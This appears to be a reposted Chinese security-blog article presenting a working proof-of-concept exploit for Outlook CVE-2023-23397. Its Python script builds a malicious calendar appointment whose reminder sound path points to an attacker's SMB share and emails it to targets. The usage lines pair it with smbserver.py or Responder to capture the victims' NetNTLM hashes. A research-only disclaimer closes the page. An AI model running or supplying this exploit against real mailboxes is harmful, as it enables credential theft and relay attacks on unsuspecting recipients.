Outlook CVE-2023-23397

admin 2024年11月14日22:50:32评论5 views字数 2471阅读8分14秒阅读模式

        制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。

https://github.com/Trackflaw/CVE-2023-23397/blob/main/poc.gif

Outlook CVE-2023-23397

Outlook CVE-2023-23397

Outlook CVE-2023-23397

In one session :

python CVE-2023-23397.pyusage: CVE-2023-23397.py [-h] -p PATHCVE-2023-23397.py: error: the following arguments are required: -p/--pathpython CVE-2023-23397.py --path '\yourip'

In a second session (smbserver or responder as you want).

smbserver.py -smb2support SHARE .
import smtplib, datetime, argparsefrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.application import MIMEApplicationfrom email.utils import COMMASPACE, formatdatefrom independentsoft.msg import Message# Mail configuration : change it !smtp_server = "mail.example.com"smtp_port = 587sender_email = "[email protected]"sender_password = "P@ssw0rd"recipients_email = ["[email protected]"]class Email:    def __init__(self, smtp_server, port, username, password, recipient):        self.smtp_server = smtp_server        self.port = port        self.username = username        self.password = password        self.recipient = recipient    def send(self, subject, body, attachment_path):        msg = MIMEMultipart()        msg['From'] = self.username        msg['To'] = COMMASPACE.join(self.recipient)        msg['Date'] = formatdate(localtime=True)        msg['Subject'] = subject        msg.attach(MIMEText(body))        with open(attachment_path, 'rb') as f:            part = MIMEApplication(f.read(), Name=attachment_path)            part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'            msg.attach(part)        try:            server = smtplib.SMTP(self.smtp_server, self.port)            server.starttls()            server.login(self.username, self.password)            server.sendmail(self.username, self.recipient, msg.as_string())            server.quit()            print("[+] Malicious appointment sent !")        except Exception as e:            print("[-] Error with SMTP server...", e)parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)args = parser.parse_args()appointment = Message()appointment.message_class = "IPM.Appointment"appointment.subject = "CVE-2023-23397"appointment.body = "New meeting now !"appointment.location = "Paris"appointment.appointment_start_time = datetime.datetime.now()appointment.appointment_end_time = datetime.datetime.now()appointment.reminder_override_default = Trueappointment.reminder_sound_file = args.pathappointment.save("appointment.msg")email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)subject = "Hello There !"body = "Important appointment !"email.send(subject, body, "appointment.msg")

原文始发于微信公众号(Khan安全攻防实验室):Outlook CVE-2023-23397

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月14日22:50:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Outlook CVE-2023-23397https://cn-sec.com/archives/1636876.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息